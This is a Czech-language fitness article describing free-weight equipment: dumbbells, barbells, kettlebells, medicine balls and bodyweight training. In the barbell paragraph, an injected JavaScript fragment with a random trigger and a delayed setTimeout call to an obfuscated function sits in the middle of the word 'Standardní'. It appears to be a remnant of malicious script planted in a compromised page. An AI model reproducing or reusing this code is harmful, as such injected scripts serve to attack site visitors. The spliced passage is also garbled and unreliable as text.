Tréninky

VELKÝ PŘÍNOS VOLNÉ ZÁTĚŽE

Nejste si jistí, jaký druh volné zátěže zvolit a kdy? Tady je všechno, co potřebujete vědět.

Ti, kteří s posilovacím tréninkem začínají, bývají často zahlceni vybavením posiloven. Kam se podívají, tam číhají stroje a pomůcky, s nimiž si mnohdy neví rady. Chce to hlavně nepropadat panice a držet se základů, což obvykle znamená – činek!

JEDNORUČKY

Jsou velmi efektivní a univerzální. Kdybyste si měli vybrat jednu pomůcku do svojí domácí posilovny, rozhodně by to měl být pár jednoruček. Jednoručky můžete použít dvě zároveň, a navíc nabízí možnost unilaterálního procvičení, kdy se pohybuje pouze jedna strana těla, což stroje ani velká činky zprostředkovat nemohou. Kromě toho nezapojujete jen primární svaly, ale sekundárně pracují také svaly stabilizační. Jednoruční činky můžete použít k budování objemu, síly i vytrvalosti, plus – s ohledem na charakter tréninku – také ke spalování tuků.

VELKÉ ČINKY

Základní vybavení každé posilovny. Velká činka je excelentní pomůckou, kterou uvítáte v každém posilovacím tréninku. Standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andardní velká tyč váží 20 kg a můžete na ni nakládat kotouče různé váhy, které zajistíte zarážkou. Podobně jako jednoručky, jsou i velké činky velmi univerzální a můžete je využít k procvičení prakticky každé velké svalové partie svého těla. Umožní vám cvičit s vyšší váhou, než jakou zvládnete s jednoručkami. Jsou skvělé k budování síly i objemu.

KETTLEBELLS

Byly prvně využity v 18. století ruskými siláky. Tenkrát vypadaly jako dělové koule s madlem. A podobně jako jednoručky se vyráběly v různých velikostech. Jedná se o užitečnou pomůcku ke zvládnutí funkčního tréninku, která vám umožní stimulovat celou řadu svalových skupin současně při cvicích, jako jsou švihy, trh nebo přenášení. Jsou značnou výzvou pro sílu vašeho úchopu a svaly jsou díky nim aktivovány trochu jiným způsobem, protože váha činky není vyvážena vně ruky, jako když držíte jednoručku. Proto při cvičení s nimi přichází ve velké míře ke slovu svaly trupu. Provedené výzkumy prokázaly, že u testovaných sportovců se síla trupu zvýšila až o 70 %, když používali v tréninku kettlebell činky. Současně mají tyto činky značný vliv na rovnováhu, množství tělesného tuku, aerobní kapacitu a celkovou sílu.

MEDICINBAL

Moderní medicinbaly vypadají různě. Mohou být větší či menší, měkčí nebo tvrdší. Každopádně jde o velmi zdařilé pomůcky pro funkční trénink. Nejenom, že budují svaly a vytrvalost, ale zlepší vaši koordinaci, reaktivitu a explozivitu pohybu. Medicinbaly jsou k dispozici v různých hmotnostech, liší se jejich reaktivita a v důsledku toho i využití. Každopádně má cvičení s nimi opravdu značný vliv na rychlost metabolismu.

VÁHA VLASTNÍHO TĚLA

I vaše tělo je vlastně taková volná zátěž. Jeho použití vás v podstatě nic nestojí a přitom vám nabízí bezpočet možností využití. Lidé budou možná argumentovat tím, že nic jiného v tréninku vlastně nepotřebujete. Dřepy, shyby, kliky, šplh na laně, výskoky na box a řada dalších, převážně plyometrických cviků, se dají provádět pouze s váhou vlastního těla. Přitom jde o cviky zapojující současně několik velkých svalových partií a spalující spousty kalorií. A současně se může jednat i o cviky překvapivě náročné, zejména pro začátečníky. Ti musí některé z nich modifikovat, pokročilejší naopak využijí třeba TRX, aby s náročností tréninku „kouzlili“ podle svých nároků.